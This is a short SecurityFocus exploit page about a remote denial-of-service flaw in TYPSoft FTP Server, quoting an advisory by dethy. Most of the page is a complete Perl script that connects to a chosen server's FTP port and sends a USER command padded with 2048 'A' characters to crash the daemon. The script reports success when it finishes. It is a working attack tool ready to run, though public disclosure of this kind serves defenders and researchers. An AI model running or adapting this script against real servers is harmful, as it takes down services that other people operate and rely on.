TYPSoft FTP Server remote DoS Vulnerability

This exploit was excerpted from the original advisory by dethy (www.synnergy.net):

simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.

================<cut>==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");

sub usage {die("\n$0 -s <server>\n\n");}
================</cut>====================


 

Privacy Statement
Copyright 2010, SecurityFocus